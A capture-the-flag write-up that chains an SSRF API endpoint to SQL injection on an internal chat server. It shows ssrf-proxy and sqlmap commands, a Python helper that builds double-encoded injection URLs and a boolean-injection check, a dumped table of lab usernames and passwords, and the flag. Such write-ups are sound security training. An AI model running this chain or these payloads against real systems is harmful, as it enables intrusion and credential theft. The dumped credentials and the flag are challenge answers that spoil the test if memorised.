Triskel 2 : Going in
Category: Airport hall/web
20 points
What did you do? You shouldn’t have access to this chat, but you can’t do anything from it right?
by Remsio
Solution
This picks up where I left off at the end of the Triskel 1 challenge.
There was one interesting thing in the source of the chat page: a search option (chercher in French).
A few SQLi attempts in that parameter gave me 400 Bad Request, which reassured me that I was on the right track.
I decided to automate the process; my choice was a combination of ssrf-proxy with sqlmap. Note that it was my first time using these tools.
I launched ssrf-proxy as below. I set --rules=noproto so that the http:// prefix is stripped from the URL injected into the api parameter.
ssrf-proxy -u http://10.45.4.38:8100/api/call_api.php?api=xxURLxx --rules=noproto
Then I ran sqlmap through the proxy as below, pointing it at the internal chat host.
export ALL_PROXY=http://127.0.0.1:8081
sqlmap -u http://10.0.42.200/?search=% --dump
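The SSRF-to-SQLi chain above, reduced to the two things it depends on, as an added example that is not part of the original write-up and not ssrf-proxy's or sqlmap's own code: how the outer request has to be built so the inner URL survives the API wrapper (what --rules=noproto achieves), and the manual boolean check that sqlmap automates. The hosts, paths and parameter names come from the write-up; the fetch transport and the fake responder are assumptions so that the script runs offline.

```python
"""Chaining an SSRF endpoint to a SQL injection on an internal host.

Added example, not code from the original write-up or from ssrf-proxy/sqlmap.
Hosts, paths and parameter names come from the write-up; the `fetch`
transport and the fake responder are assumptions so it runs offline.
"""
from urllib.parse import parse_qs, quote, urlencode, urlparse

SSRF_API = "http://10.45.4.38:8100/api/call_api.php"  # reachable SSRF endpoint
INNER_SEARCH = "http://10.0.42.200/?search="          # internal chat search


def inner_search_url(payload: str) -> str:
    """Internal chat URL with the injection payload encoded once for the
    inner request (quote, not quote_plus: spaces become %20)."""
    return INNER_SEARCH + quote(payload, safe="")


def ssrf_wrap(inner_url: str, noproto: bool = True) -> str:
    """Embed the inner URL in the SSRF endpoint's `api` parameter.

    noproto mirrors ssrf-proxy's --rules=noproto: the scheme is dropped
    because the wrapper prepends it. urlencode encodes the inner URL a
    second time, so the payload is double-encoded on the wire: the wrapper
    decodes once and the internal chat decodes once more.
    """
    if noproto and "://" in inner_url:
        inner_url = inner_url.split("://", 1)[1]
    return SSRF_API + "?" + urlencode({"api": inner_url})


def boolean_sqli_confirmed(fetch) -> bool:
    """The manual check sqlmap automates for a LIKE-style search.

    Two syntactically valid queries that differ only in a true or false
    tautology must both return 200 but with different bodies. A 400 on a
    lone quote by itself does not prove injection: the API wrapper could
    reject the URL before the database ever sees it.
    fetch(url) -> (status, body) is an assumed transport; in the lab it
    would be an HTTP GET to the SSRF endpoint.
    """
    status_t, body_t = fetch(ssrf_wrap(inner_search_url("%' AND '1'='1")))
    status_f, body_f = fetch(ssrf_wrap(inner_search_url("%' AND '1'='2")))
    return status_t == 200 and status_f == 200 and body_t != body_f


def fake_internal_chat(url: str):
    """Constructed stand-in for call_api.php plus the internal chat, used
    only so the example runs offline. It decodes `api` once, then `search`
    once, and emulates a naive WHERE ... LIKE '<search>' query."""
    api = parse_qs(urlparse(url).query)["api"][0]                    # outer decode
    search = parse_qs(urlparse("http://" + api).query)["search"][0]  # inner decode
    sql = f"SELECT title FROM news WHERE title LIKE '{search}'"
    if sql.count("'") % 2:          # unbalanced quote: SQL error -> 400
        return 400, "Bad Request"
    if "'1'='2'" in sql:            # false tautology: query runs, no rows
        return 200, "no results"
    return 200, "3 results"


if __name__ == "__main__":
    print(ssrf_wrap(inner_search_url("%")))
    print("boolean SQLi confirmed:", boolean_sqli_confirmed(fake_internal_chat))
```

The double encoding in ssrf_wrap is the detail that ssrf-proxy handles for sqlmap transparently: sqlmap encodes its payload for the internal host, and the proxy encodes the whole inner URL once more for the api parameter, so each hop decodes exactly once.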
The interesting part of the output was the user_news table.
Database: db
Table: user_news
[6 entries]
+----+----------------------------+----------------------+
| id | password                   | username             |
+----+----------------------------+----------------------+
| 1  | D.!uTra+b+wrUVH5s?^AE3a~X  | admin_richard_lauren |
| 2  | X^UY6M=ohMA_ek3g{}Pm:mw:&A | admin_denis_valette  |
| 3  | 69PCrHE287Tavvg            | dev_arienne_dupuy    |
| 4  | JC44n24D6ejGKym            | dev_leroy_bedart     |
| 5  | FwX6Pk29x2uAz7S            | dev_pomeroy_dagenais |
| 6  | ypGk2ZtM7QRt343            | dev_denis_tetrault   |
+----+----------------------------+----------------------+
I logged in with the dev_leroy_bedart credentials on the http://10.45.4.38:8100/ website and found the flag on the Admin subpage.
Flag
NORZH{Hidden_C0r0n4_ch4t_y0u_are_the_admin_now!:)}